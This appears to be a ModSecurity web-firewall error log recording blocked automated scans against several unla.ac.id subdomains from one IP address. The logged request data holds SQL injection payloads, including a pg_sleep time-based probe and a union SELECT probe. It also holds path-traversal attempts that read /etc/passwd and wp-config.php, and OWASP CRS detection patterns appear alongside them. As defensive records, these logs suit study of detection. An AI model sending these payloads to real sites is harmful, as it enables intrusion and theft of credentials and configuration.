[Tue Aug 29 11:37:16.540401 2023] [:error] [pid 1437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO11-MCo-f0AAAWdstsAAAAM"]
[Tue Aug 29 11:37:16.596457 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO11-MCo-f0AAAW9IWkAAAAI"]
[Tue Aug 29 11:37:16.618560 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-MCo-f0AAAXA9XIAAAAO"]
[Tue Aug 29 11:37:16.619093 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO11-MCo-f0AAAWuq@EAAAAZ"]
[Tue Aug 29 11:37:16.652654 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/download.php"] [unique_id "ZO11-MCo-f0AAAWuq@IAAAAZ"]
[Tue Aug 29 11:37:16.652784 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO11-MCo-f0AAAXA9XMAAAAO"]
[Tue Aug 29 11:37:16.655819 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-MCo-f0AAAW9IWwAAAAI"]
[Tue Aug 29 11:37:16.669003 2023] [:error] [pid 1437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-MCo-f0AAAWdsuEAAAAM"]
[Tue Aug 29 11:37:16.687845 2023] [:error] [pid 1437] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO11-MCo-f0AAAWdsuIAAAAM"]
[Tue Aug 29 11:37:16.692743 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-MCo-f0AAAXA9XUAAAAO"]
[Tue Aug 29 11:37:16.695631 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO11-MCo-f0AAAW9IW4AAAAI"]
[Tue Aug 29 11:37:18.812297 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11-sCo-f0AAAXA9ZcAAAAO"]
[Tue Aug 29 11:37:25.381723 2023] [:error] [pid 1465] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12BcCo-f0AAAW51eIAAAAF"]
[Tue Aug 29 11:37:25.384209 2023] [:error] [pid 1473] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:tf_version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:tf_version: ' and (select pg_sleep(10)) ISNULL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/api/search/attribute"] [unique_id "ZO12BcCo-f0AAAXBl@QAAAAP"]
[Tue Aug 29 11:37:27.381698 2023] [:error] [pid 1482] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12B8Co-f0AAAXK558AAAAY"]
[Tue Aug 29 11:37:27.384090 2023] [:error] [pid 1488] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO12B8Co-f0AAAXQJ6kAAAAj"]
[Tue Aug 29 11:37:27.463451 2023] [:error] [pid 1465] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12B8Co-f0AAAW51e0AAAAF"]
[Tue Aug 29 11:37:27.466489 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12B8Co-f0AAAXEH2EAAAAN"]
[Tue Aug 29 11:37:27.467309 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12B8Co-f0AAAV1EPcAAAAd"]
[Tue Aug 29 11:37:35.387574 2023] [:error] [pid 1488] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12D8Co-f0AAAXQJ84AAAAj"]
[Tue Aug 29 11:37:35.389351 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12D8Co-f0AAAW9Ic8AAAAI"]
[Tue Aug 29 11:37:35.389561 2023] [:error] [pid 1474] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12D8Co-f0AAAXCUCoAAAAG"]
[Tue Aug 29 11:37:35.394343 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12D8Co-f0AAAXEH4QAAAAN"]
[Tue Aug 29 11:37:35.427474 2023] [:error] [pid 1482] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12D8Co-f0AAAXK58cAAAAY"]
[Tue Aug 29 11:37:36.368970 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12EMCo-f0AAAWpXlMAAAAW"]
[Tue Aug 29 11:37:37.414125 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12EcCo-f0AAAV1ESQAAAAd"]
[Tue Aug 29 11:37:37.523697 2023] [:error] [pid 1490] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12EcCo-f0AAAXSzpQAAAAA"]
[Tue Aug 29 11:37:37.524593 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12EcCo-f0AAAWBBVgAAAAB"]
[Tue Aug 29 11:37:37.526747 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12EcCo-f0AAAWurDcAAAAZ"]
[Tue Aug 29 11:37:37.594219 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12EcCo-f0AAAXA9gAAAAAO"]
[Tue Aug 29 11:37:43.532105 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO12F8Co-f0AAARiDqIAAAAJ"]
[Tue Aug 29 11:37:44.425868 2023] [:error] [pid 1474] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12GMCo-f0AAAXCUGgAAAAG"]
[Tue Aug 29 11:37:45.352568 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12GcCo-f0AAAWvFKIAAAAa"]
